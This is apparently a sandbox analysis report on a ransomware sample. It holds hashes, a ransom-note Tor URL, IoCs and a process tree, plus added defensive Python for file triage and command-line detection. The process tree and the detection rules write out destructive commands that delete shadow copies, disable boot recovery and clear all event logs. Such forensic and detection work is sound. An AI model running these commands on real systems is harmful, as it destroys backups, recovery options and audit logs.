Resubmissions
date              analysis id         score
19-01-2023 10:17  230119-mbpsksff79   10
14-11-2022 04:26  221114-e2qhsseg47   10
20-01-2022 19:02  220120-xptc2abbh7   10

Analysis
max time kernel:   42s
max time network:  45s
platform:          windows7_x64
resource:          win7-20220812-en
resource tags:     arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted:         14-11-2022 04:26
Behavioral tasks
behavioral1: sample c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe on resource win7-20220812-en
behavioral2: sample c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe on resource win10v2004-20220812-en
General
Target:  c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe
Size:    2.9MB
MD5:     ccde3fe374a219ed3a85a0bf548542c3
SHA1:    c1187fe0eaddee995773d6c66bcb558536e9b62c
SHA256:  c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40
SHA512:  94852c04d6f627b35a7486de166648eb43373850b862e1958e676c53fd5dc37103659fe28e2b51f2fffd815ded2745d8793d8158543ff14b1e1f0cafe2a3c63c
SSDEEP:  49152:4dwE1vCCeShiBHJFIPiEPE3bvk6Ca89388YhwjfJNt/RgaJ2wtb:WwE1253IPiYE3bnCa8Hzj5vwwtb
Malware Config
Extracted from: C:\RECOVER-mfqssdj-FILES.txt (the ransom note dropped by the sample)
URL in the note (Tor hidden service, with an access-key query parameter):
http://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion/?access-key=RrffeR4CVartLMYTErq9%2FPVD%2Fz4sez5toskePW0P8urvDeotAomkbpUCg6JYW4MMxbX73YDPXMk3wQW0oSYnXGy5aGuT9ZPXpJKPaE6kYN9nNcxMBi92FcIv80rEpVUY9S5ukN796JGSdG%2BeWBVgx6nvw2vlhogyu35Ht2Iz6r6Zcc4J4mdX6RuzKXu5eny7saSaH0LMN6GYnIUfTF5UMR%2BtUchaTLOHyU5i1FnYeueodio9ECm8BgQ5Hbb3%2BIWlgrlEf4htHAwvPwCn2ld8lheacG87vkFKekfFCGErE5lNgNr12JSohBq1tH%2B3O8gw%2FG86wBsC46qR82KshQKpzQ%3D%3D
Signatures
(<sample>.exe below stands for c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe)
-
Deletes shadow copies  (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit  (1 TTP, 2 IoCs)
  pid   process
  1760  bcdedit.exe
  1692  bcdedit.exe
-
Modifies extensions of user files  (5 IoCs)
  Ransomware generally changes the extension on encrypted files.
  process for every row: <sample>.exe
  description                   ioc
  File opened for modification  C:\Users\Admin\Pictures\CopyConnect.tiff
  File renamed                  C:\Users\Admin\Pictures\AddMerge.png => C:\Users\Admin\Pictures\AddMerge.png.mfqssdj
  File opened for modification  C:\Users\Admin\Pictures\AddMerge.png.mfqssdj
  File renamed                  C:\Users\Admin\Pictures\CopyConnect.tiff => C:\Users\Admin\Pictures\CopyConnect.tiff.mfqssdj
  File opened for modification  C:\Users\Admin\Pictures\CopyConnect.tiff.mfqssdj
-
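The ransom note name (C:\RECOVER-mfqssdj-FILES.txt, also set as the wallpaper image RECOVER-mfqssdj-FILES.txt.png) and the extension appended to encrypted files (.mfqssdj) carry the same token. The following is an added host-triage example, not code from the report or from the sample: it learns the token from any note it finds, enumerates every file carrying that extension, recovers the pre-rename name and reports whether the original is still present beside the encrypted copy. The directory tree it walks is constructed in a temporary folder and modelled on the paths in the IoC list above; the note-name pattern is an assumption generalised from this one sample.

```python
"""Host triage for the file-system artefacts in this report.

Added example, not part of the sandbox report or of the sample. The ransom note
name and the appended extension share one token (mfqssdj in this report), so the
scanner learns the token from the notes it finds and then enumerates every file
carrying that extension. The directory tree is constructed in a temporary folder;
the note-name pattern is an assumption generalised from this one sample.
"""
import os
import re
import tempfile

# RECOVER-<token>-FILES.txt, or the .txt.png copy the sample sets as wallpaper.
NOTE_RE = re.compile(r"^RECOVER-([A-Za-z0-9]+)-FILES\.txt(?:\.png)?$")


def note_files(root):
    """Return [(path, token)] for every ransom note (or its .png wallpaper copy) under root."""
    notes = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            match = NOTE_RE.match(name)
            if match:
                notes.append((os.path.join(dirpath, name), match.group(1)))
    return sorted(notes)


def encrypted_files(root, token):
    """Return [(encrypted_path, original_path, original_present)] for every file named *.<token>."""
    suffix = "." + token
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            # len() guard: a file literally named ".mfqssdj" has no original name to recover.
            if name.endswith(suffix) and len(name) > len(suffix):
                enc = os.path.join(dirpath, name)
                orig = enc[: -len(suffix)]
                found.append((enc, orig, os.path.exists(orig)))
    return sorted(found)


def triage(root):
    """Summarise infection markers under root, keyed by the token learned from the notes."""
    report = {}
    for path, token in note_files(root):
        report.setdefault(token, {"notes": [], "encrypted": [], "originals_present": []})
        report[token]["notes"].append(path)
    for token, entry in report.items():
        for enc, orig, present in encrypted_files(root, token):
            entry["encrypted"].append(enc)
            if present:  # original left beside the encrypted copy: worth a closer look
                entry["originals_present"].append(orig)
    return report


def build_fixture():
    """Constructed directory tree modelled on the paths in the IoC list (not real victim data)."""
    root = tempfile.mkdtemp(prefix="triage-")
    layout = {
        "RECOVER-mfqssdj-FILES.txt": "ransom note",
        "Users/Admin/Pictures/RECOVER-mfqssdj-FILES.txt": "ransom note",
        "Users/Admin/Desktop/RECOVER-mfqssdj-FILES.txt.png": b"\x89PNG stub",
        "Users/Admin/Pictures/AddMerge.png.mfqssdj": "ciphertext",
        "Users/Admin/Pictures/CopyConnect.tiff.mfqssdj": "ciphertext",
        "Users/Admin/Pictures/Untouched.jpg": "plaintext",
        "Users/Admin/Desktop/todo.txt": "plaintext",
    }
    for rel, content in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        mode = "wb" if isinstance(content, bytes) else "w"
        with open(path, mode) as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    fixture = build_fixture()
    for token, entry in triage(fixture).items():
        print(f"token {token}: {len(entry['notes'])} notes, {len(entry['encrypted'])} encrypted files, "
              f"{len(entry['originals_present'])} originals still present")
```

Point triage() at a mounted victim volume (or a forensic image mount) instead of the fixture; learning the token from the note rather than hard-coding ".mfqssdj" matters because the token differs per victim.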
Enumerates connected drives  (3 TTPs, 1 IoC)
  Attempts to read the root path of hard drives other than the default C: drive.
  description              ioc      process
  File opened (read-only)  \??\Z:   <sample>.exe
-
Sets desktop wallpaper using registry  (2 TTPs, 2 IoCs)
  process for both rows: <sample>.exe (the two value names differ only in case; the registry is case-insensitive, so both hit the same value)
  description      ioc
  Set value (str)  \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\Admin\\Desktop\\RECOVER-mfqssdj-FILES.txt.png"
  Set value (str)  \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\RECOVER-mfqssdj-FILES.txt.png"
-
Interacts with shadow copies  (2 TTPs, 2 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid   process
  1908  vssadmin.exe
  1216  vssadmin.exe
-
Modifies Control Panel  (1 IoC)
  description      ioc                                                                                              process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\WallpaperStyle = "0"   <sample>.exe
-
Suspicious behavior: EnumeratesProcesses  (31 IoCs)
  31 identical entries: pid 1112, process <sample>.exe
-
Suspicious use of AdjustPrivilegeToken  (64 IoCs)
  Privileges enabled via AdjustTokenPrivileges, grouped by process. The sandbox left three privileges as raw LUIDs: 33 is SeIncreaseWorkingSetPrivilege, 34 is SeTimeZonePrivilege and 35 is SeCreateSymbolicLinkPrivilege.
  pid 916, WMIC.exe (the following 20 privileges, adjusted twice each, 40 entries):
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
    SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  pid 1112, <sample>.exe (23 entries):
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
    SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege,
    SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 33, 34, 35
  pid 764, WMIC.exe (1 entry, where the 64-entry listing ends):
    SeIncreaseQuotaPrivilege
-
Suspicious use of WriteProcessMemory  (64 IoCs)
  Each row is one parent/child pair from the process tree; identical entries are counted rather than repeated. The listing stops at 64 entries, so the later children in the process tree (bcdedit, wevtutil and the second vssadmin/WMIC pair) do not appear here.
  parent pid  parent process  child pid  procid_target  entries
  1112        <sample>.exe    1780       28             4
  1780        cmd.exe         916        30             4
  1112        <sample>.exe    1764       32             4
  1764        cmd.exe         1412       34             4
  1112        <sample>.exe    1416       35             4
  1416        cmd.exe         300        37             4
  1112        <sample>.exe    828        38             4
  1112        <sample>.exe    1364       39             4
  1112        <sample>.exe    864        42             4
  864         cmd.exe         1908       45             3
  1364        cmd.exe         1372       44             4
  1112        <sample>.exe    1972       46             4
  1972        cmd.exe         1808       49             4
  396         <sample>.exe    1932       51             4
  1932        cmd.exe         764        53             4
  1112        <sample>.exe    1736       55             4
  1736        cmd.exe         1904       57             1
  (<sample>.exe = c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe)
Processes
-
<sample>.exe below stands for c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe; the bracketed number is the depth in the tree, as in the original listing. The first batch of children runs under the 32-bit C:\Windows\SysWOW64\ cmd.exe (the sample is an x86 binary on x64 Windows), while the shadow-copy, boot-configuration and event-log commands run the native C:\Windows\system32\ binaries. PIDs 1904, 1972 and 1692 each appear twice on different processes, so a PID alone is not a stable identifier across this trace.

[1] C:\Users\Admin\AppData\Local\Temp\<sample>.exe   PID 1112
    cmdline: C:\Users\Admin\AppData\Local\Temp\<sample>.exe --access-token 12345
    - Modifies extensions of user files
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Modifies Control Panel
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe   PID 1780
      cmdline: "C:\Windows\system32\cmd.exe" /c "wmic csproduct get UUID"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe   PID 916
        cmdline: wmic csproduct get UUID
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe   PID 1764
      cmdline: "C:\Windows\system32\cmd.exe" /c "fsutil behavior set SymlinkEvaluation R2L:1"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\fsutil.exe   PID 1412
        cmdline: fsutil behavior set SymlinkEvaluation R2L:1
  [2] C:\Windows\SysWOW64\cmd.exe   PID 1416
      cmdline: "C:\Windows\system32\cmd.exe" /c "fsutil behavior set SymlinkEvaluation R2R:1"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\fsutil.exe   PID 300
        cmdline: fsutil behavior set SymlinkEvaluation R2R:1
  [2] C:\Windows\SysWOW64\cmd.exe   PID 828
      cmdline: "C:\Windows\system32\cmd.exe" /c "iisreset.exe /stop"
  [2] C:\Windows\SysWOW64\cmd.exe   PID 1364
      cmdline: "C:\Windows\system32\cmd.exe" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\reg.exe   PID 1372
        cmdline: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
  [2] C:\Windows\system32\cmd.exe   PID 864
      cmdline: "C:\Windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe   PID 1908
        cmdline: vssadmin.exe Delete Shadows /all /quiet
        - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\cmd.exe   PID 1972
      cmdline: "C:\Windows\system32\cmd.exe" /c "arp -a"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\ARP.EXE   PID 1808
        cmdline: arp -a
  [2] C:\Users\Admin\AppData\Local\Temp\<sample>.exe   PID 396
      cmdline: "C:\Users\Admin\AppData\Local\Temp\<sample>.exe" --child --access-token 12345
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe   PID 1932
        cmdline: "C:\Windows\system32\cmd.exe" /c "wmic csproduct get UUID"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\Wbem\WMIC.exe   PID 764
          cmdline: wmic csproduct get UUID
          - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe   PID 1736
      cmdline: "C:\Windows\system32\cmd.exe" /c "wmic.exe Shadowcopy Delete"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\Wbem\WMIC.exe   PID 1904
        cmdline: wmic.exe Shadowcopy Delete
  [2] C:\Windows\system32\cmd.exe   PID 1100
      cmdline: "C:\Windows\system32\cmd.exe" /c "bcdedit /set {default}"   (recorded as-is, with no option after {default})
    [3] C:\Windows\system32\bcdedit.exe   PID 1760
        cmdline: bcdedit /set {default}
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\system32\cmd.exe   PID 696
      cmdline: "C:\Windows\system32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
    [3] C:\Windows\system32\bcdedit.exe   PID 1692
        cmdline: bcdedit /set {default} recoveryenabled No
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\system32\cmd.exe   PID 932
      cmdline: "C:\Windows\system32\cmd.exe" /c "cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1""
    [3] C:\Windows\system32\cmd.exe   PID 1016
        cmdline: cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
  [2] C:\Windows\system32\cmd.exe   PID 232
      cmdline: "C:\Windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"
    [3] C:\Windows\system32\vssadmin.exe   PID 1216
        cmdline: vssadmin.exe Delete Shadows /all /quiet
        - Interacts with shadow copies
  [2] C:\Windows\system32\cmd.exe   PID 1904
      cmdline: "C:\Windows\system32\cmd.exe" /c "wmic.exe Shadowcopy Delete"
    [3] C:\Windows\System32\Wbem\WMIC.exe   PID 1972
        cmdline: wmic.exe Shadowcopy Delete
  [2] C:\Windows\system32\cmd.exe   PID 1692
      cmdline: "C:\Windows\system32\cmd.exe" /c "cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1""
    [3] C:\Windows\system32\cmd.exe   PID 472
        cmdline: cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
[1] C:\Windows\system32\vssvc.exe   PID 576   (Volume Shadow Copy service)
    cmdline: C:\Windows\system32\vssvc.exe
[1] C:\Windows\system32\vssvc.exe   PID 1508   (Volume Shadow Copy service)
    cmdline: C:\Windows\system32\vssvc.exe
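The command lines in the process tree above (vssadmin and WMIC shadow-copy deletion, bcdedit recoveryenabled No, the wevtutil log-clearing loop, iisreset /stop, the fsutil and reg changes, the wmic csproduct and arp discovery) are what an endpoint detection keys on, and the useful signal is that they all descend from one process. The following is an added example, not part of the sandbox report or of the sample: a small rule set run over constructed process-creation events (pid, parent pid, image, command line, in the shape of Sysmon Event ID 1) modelled on the tree above. It attributes every hit to the root of its parent chain and alerts when one root accumulates several recovery-inhibiting or log-clearing commands, so that an isolated admin running vssadmin list shadows does not fire. The event layout, the stand-in sample name, the PIDs and the alert threshold are assumptions; the bootstatuspolicy rule is a common companion command that this report does not show.

```python
"""Command-line detection for the tradecraft in this report's process tree.

Added example, not part of the sandbox report or of the sample. It runs regex
rules over constructed process-creation events (pid, parent pid, image, command
line, Sysmon Event ID 1 style), attributes each hit to the root of its parent
chain, and alerts when one root accumulates several recovery-inhibiting or
log-clearing commands. The event layout, the stand-in sample name, the PIDs and
the alert threshold are assumptions; the bootstatuspolicy rule is a common
companion command that this report does not show.
"""
import re
from collections import defaultdict

# (rule name, ATT&CK technique, category, pattern applied to the normalised command line)
RULES = [
    ("vssadmin_delete_shadows",    "T1490",     "destructive", r"vssadmin(\.exe)?\s+delete\s+shadows"),
    ("wmic_shadowcopy_delete",     "T1490",     "destructive", r"wmic(\.exe)?\s+shadowcopy\s+delete"),
    ("bcdedit_recoveryenabled_no", "T1490",     "destructive", r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no"),
    ("bcdedit_ignoreallfailures",  "T1490",     "destructive", r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures"),
    ("wevtutil_clear_logs",        "T1070.001", "destructive", r"wevtutil(\.exe)?\s+cl\s"),
    ("iisreset_stop",              "T1489",     "destructive", r"iisreset(\.exe)?\s+/stop"),
    ("fsutil_symlink_evaluation",  "-",         "config",      r"fsutil\s+behavior\s+set\s+symlinkevaluation\s+r2[lr]:1"),
    ("reg_lanmanserver_maxmpxct",  "T1112",     "config",      r"reg(\.exe)?\s+add\s+\S*lanmanserver\\parameters\s+/v\s+maxmpxct"),
    ("wmic_csproduct_uuid",        "T1082",     "discovery",   r"wmic(\.exe)?\s+csproduct\s+get\s+uuid"),
    ("arp_table_dump",             "T1018",     "discovery",   r"\barp(\.exe)?\s+-a\b"),
]
COMPILED = [(name, re.compile(pattern)) for name, _, _, pattern in RULES]
TECHNIQUE = {name: tech for name, tech, _, _ in RULES}
CATEGORY = {name: cat for name, _, cat, _ in RULES}

# Constructed events modelled on the process tree in this report; the sample name is a stand-in.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\sample.exe"
CMD32 = r"C:\Windows\SysWOW64\cmd.exe"
CMD64 = r"C:\Windows\system32\cmd.exe"
EVENTS = [  # (pid, ppid, image, command line)
    (1112, 1000, SAMPLE, "sample.exe --access-token 12345"),
    (1780, 1112, CMD32, 'cmd.exe /c "wmic csproduct get UUID"'),
    (916, 1780, r"C:\Windows\SysWOW64\Wbem\WMIC.exe", "wmic csproduct get UUID"),
    (1764, 1112, CMD32, 'cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"'),
    (828, 1112, CMD32, 'cmd.exe /c "iisreset.exe /stop"'),
    (1364, 1112, CMD32, r'cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"'),
    (864, 1112, CMD64, 'cmd.exe /c "vssadmin.exe Delete Shadows /all /quiet"'),
    (1908, 864, r"C:\Windows\system32\vssadmin.exe", "vssadmin.exe Delete Shadows /all /quiet"),
    (1972, 1112, CMD32, 'cmd.exe /c "arp -a"'),
    (396, 1112, SAMPLE, "sample.exe --child --access-token 12345"),
    (1932, 396, CMD32, 'cmd.exe /c "wmic csproduct get UUID"'),
    (1736, 1112, CMD64, 'cmd.exe /c "wmic.exe Shadowcopy Delete"'),
    (696, 1112, CMD64, 'cmd.exe /c "bcdedit /set {default} recoveryenabled No"'),
    (932, 1112, CMD64, 'cmd.exe /c "cmd.exe /c for /F "tokens=*" %1 in (\'wevtutil.exe el\') DO wevtutil.exe cl "%1""'),
    # Unrelated admin session: read-only, must not be attributed to the sample.
    (2500, 2400, CMD64, "cmd.exe /c vssadmin list shadows"),
]


def normalise(cmdline):
    """Lower-case and collapse whitespace so the patterns are case- and spacing-insensitive."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def classify(cmdline):
    """Return the names of every rule whose pattern matches this command line."""
    text = normalise(cmdline)
    return [name for name, rx in COMPILED if rx.search(text)]


def root_pid(pid, parent_of):
    """Climb the parent chain to the topmost process we hold an event for.
    The visited-set guard keeps PID reuse (seen in this report) from looping."""
    seen = set()
    while pid in parent_of and parent_of[pid] in parent_of and pid not in seen:
        seen.add(pid)
        pid = parent_of[pid]
    return pid


def attribute(events):
    """Map each root process to the set of rules its descendants triggered."""
    parent_of = {pid: ppid for pid, ppid, _, _ in events}
    hits = defaultdict(set)
    for pid, _, _, cmdline in events:
        for name in classify(cmdline):
            hits[root_pid(pid, parent_of)].add(name)
    return hits


def alerts(events, min_destructive=2):
    """Alert on any root with at least min_destructive distinct destructive rules under it."""
    out = []
    for root, names in sorted(attribute(events).items()):
        destructive = sorted(n for n in names if CATEGORY[n] == "destructive")
        if len(destructive) >= min_destructive:
            out.append({"root_pid": root, "rules": destructive,
                        "techniques": sorted({TECHNIQUE[n] for n in destructive})})
    return out


if __name__ == "__main__":
    for alert in alerts(EVENTS):
        print(alert)
```

In a real pipeline key the attribution on the process GUID rather than the PID (this very report reuses PIDs 1904, 1972 and 1692), and treat the "config" and "discovery" hits as context for the alert rather than as triggers: wmic csproduct get UUID and arp -a are common in legitimate administration, which is why they do not count toward the threshold.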